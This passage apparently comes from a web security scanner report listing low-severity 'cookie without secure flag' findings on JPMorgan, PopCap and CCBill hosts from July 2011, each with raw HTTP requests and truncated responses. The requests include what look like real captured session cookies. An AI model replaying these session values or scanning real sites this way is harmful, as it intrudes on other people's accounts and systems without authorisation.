GET /js/yui/event-delegate-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1506-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1506
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util.Event,C=YA
...[SNIP]...

7.91. https://mm.jpmorgan.com/js/yui/selector-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/selector-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/selector-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7809-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7809
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util;A.Selector
...[SNIP]...

7.92. https://mm.jpmorgan.com/js/yui/tabview-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/tabview-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/tabview-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9929-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9929
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
(function(){var B=YAHOO.util,C=B.Dom,H=B.Eve
...[SNIP]...

7.93. https://mm.jpmorgan.com/js/yui/treeview-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/treeview-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/treeview-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"34319-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 34319
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var D=YAHOO.util.Dom,B=YAHO
...[SNIP]...

7.94. https://mm.jpmorgan.com/js/yui/yahoo-dom-event.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/yahoo-dom-event.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/yahoo-dom-event.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"37005-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 37005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){
...[SNIP]...

7.95. https://store.popcap.com/payment.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.popcap.com
Path:   /payment.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set: nickname (an expired deletion) and user_profile (set six times with the same value, scoped to domain=.popcap.com so it is sent to every popcap.com subdomain). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /payment.php HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; __utmb=163442877; lv=1310503702; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DCommerce%252520%25253E%252520Cart%2526pidt%253D1%2526oid%253Dhttps%25253A//store.popcap.com/payment.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:48:32 GMT
Server: Apache
Set-Cookie: nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 49903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PopCap Games -
...[SNIP]...

7.96. https://support.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:16 GMT
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/
Content-Length: 13895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CCBill Credit Ca
...[SNIP]...

7.97. https://support.ccbill.com/js/ga.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /js/ga.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga.js HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Thu, 11 Nov 2010 21:01:58 GMT
ETag: "1834f1-6230-494cd48d57d80"
Accept-Ranges: bytes
Content-Length: 25136
X-Cnection: close
Content-Type: application/x-javascript
X-Pad: avoid browser bug
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

(function(){var aa="_gat",ba="_gaq",r=true,v=false,w=undefined,ca=document,da="4.7.2",y="length",z="cookie",A="location",ea="_gaUserPrefs",fa="ioo",B="&",C="=",D="__utma=",F="__utmb=",G="__utmc=",ga="
...[SNIP]...

7.98. https://support.ccbill.com/style/css/base.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/css/base.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/base.css HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:19 GMT
Last-Modified: Wed, 08 Sep 2010 19:05:55 GMT
ETag: "286bc1-3cf4-48fc433f68ac0"
Accept-Ranges: bytes
Content-Length: 15604
X-Cnection: close
Content-Type: text/css
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

/* Lavidge Base HTML/CSS - Written By: Eric Florez - Last Updated: 2010-07-06 */
/* ====================== Page Formatting ======================== */
* {
   margin:0;
   padding:0;
   font-family:Verd
...[SNIP]...

7.99. https://support.ccbill.com/style/css/consumers.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/css/consumers.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/consumers.css HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:17 GMT
Last-Modified: Wed, 08 Sep 2010 20:06:02 GMT
ETag: "33a641-1180-48fc50af4fe80"
Accept-Ranges: bytes
Content-Length: 4480
X-Cnection: close
Content-Type: text/css
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

@import url(base.css);
/* ====================== Page Formatting ======================== */
ul.list_arrow li, #left_nav li.current_page {background-image:url(../img/icons/bullet_arrow_light_blue.gif)
...[SNIP]...

7.100. https://support.ccbill.com/style/img/background/body.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/background/body.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/body.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "2cea04-11b-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 283
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.......h......G.....-PLTE.............................................e.".....IDATx^...    .1.... 6.....mA...!...6..i...+H..`...............%..j..%].&..;^./.v.>=    9.........sP........b..
...[SNIP]...

7.101. https://support.ccbill.com/style/img/background/body_container.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/background/body_container.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/body_container.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "1674f1-362a-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 13866
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR...d.................PLTE...................................................................................................................................|...5dIDATx^...z#I.....F...{
...[SNIP]...

7.102. https://support.ccbill.com/style/img/background/main.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/background/main.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/main.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "33a652-79d-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 1949
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.......d.....".......PLTE...................................................................................................................................>.....IDATx^...n...@..90g*..
...[SNIP]...

7.103. https://support.ccbill.com/style/img/buttons/btn_search.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/buttons/btn_search.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/buttons/btn_search.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:22 GMT
Last-Modified: Wed, 08 Sep 2010 19:00:02 GMT
ETag: "2de9e6-b45-48fc41eec3080"
Accept-Ranges: bytes
Content-Length: 2885
Keep-Alive: timeout=60, max=60
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR...i...".....k.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

7.104. https://support.ccbill.com/style/img/icons/bullet_square_blk.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/icons/bullet_square_blk.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/icons/bullet_square_blk.gif HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
